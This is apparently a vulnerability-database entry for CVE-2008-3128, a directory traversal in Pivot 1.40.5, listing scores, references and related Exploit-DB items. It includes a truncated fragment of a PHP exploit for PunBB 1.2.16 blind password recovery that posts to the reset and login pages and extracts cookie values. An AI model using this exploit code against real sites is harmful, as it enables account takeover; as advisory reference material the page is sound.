CVE-2008-3128
published 2008-07-10CVE-2008-3128: Directory traversal vulnerability in search.php in Pivot 1.40.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the t parameter.
PriorityP431medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.62%
88.1th percentile
Directory traversal vulnerability in search.php in Pivot 1.40.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the t parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pivot | pivot | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Pivot 1.40.5 - Dreamwind 'load_template()' Credentials Disclosure
exploitdb·2008-06-30
CVE-2008-3128 Pivot 1.40.5 - Dreamwind 'load_template()' Credentials Disclosure
Pivot 1.40.5 - Dreamwind 'load_template()' Credentials Disclosure
---
# milw0rm.com [2008-06-30]
Exploit-DB
PunBB 1.2.16 - Blind Password Recovery
exploitdb·2008-02-21
CVE-2008-1484 PunBB 1.2.16 - Blind Password Recovery
PunBB 1.2.16 - Blind Password Recovery
---
([^([0-9]{4})-([0-9]{2})-([0-9]{2}) 2, 1 =>
md5('bite')))));
curl_setopt($h, CURLOPT_HEADER, 1);
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
'req_email='.urlencode(ADMIN_MAIL),
'request_pass=Envoyer')));
$s = curl_exec($h);
preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m);
$c = unserialize(urldecode($m[1]));
define('MD5_NOT_LOGGUED', $c[1]);
printf("Md5 not loggued : %s\n--\n", MD5_NOT_LOGGUED);
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=in');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($h, CURLOPT_HEADER, 1);
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIEL
No writeups or analysis indexed.
http://forum.pivotlog.net/viewtopic.php?t=12471http://pivot-weblog.svn.sourceforge.net/viewvc/pivot-weblog/branches/1.40.x/pivot/modules/module_parser.php?r1=1333&r2=1332&pathrev=1333http://secunia.com/advisories/30889http://www.securityfocus.com/bid/30012http://www.securitytracker.com/id?1020412http://www.vupen.com/english/advisories/2008/1991/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/43470https://www.exploit-db.com/exploits/5973http://forum.pivotlog.net/viewtopic.php?t=12471http://pivot-weblog.svn.sourceforge.net/viewvc/pivot-weblog/branches/1.40.x/pivot/modules/module_parser.php?r1=1333&r2=1332&pathrev=1333http://secunia.com/advisories/30889http://www.securityfocus.com/bid/30012http://www.securitytracker.com/id?1020412http://www.vupen.com/english/advisories/2008/1991/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/43470https://www.exploit-db.com/exploits/5973
2008-07-10
Published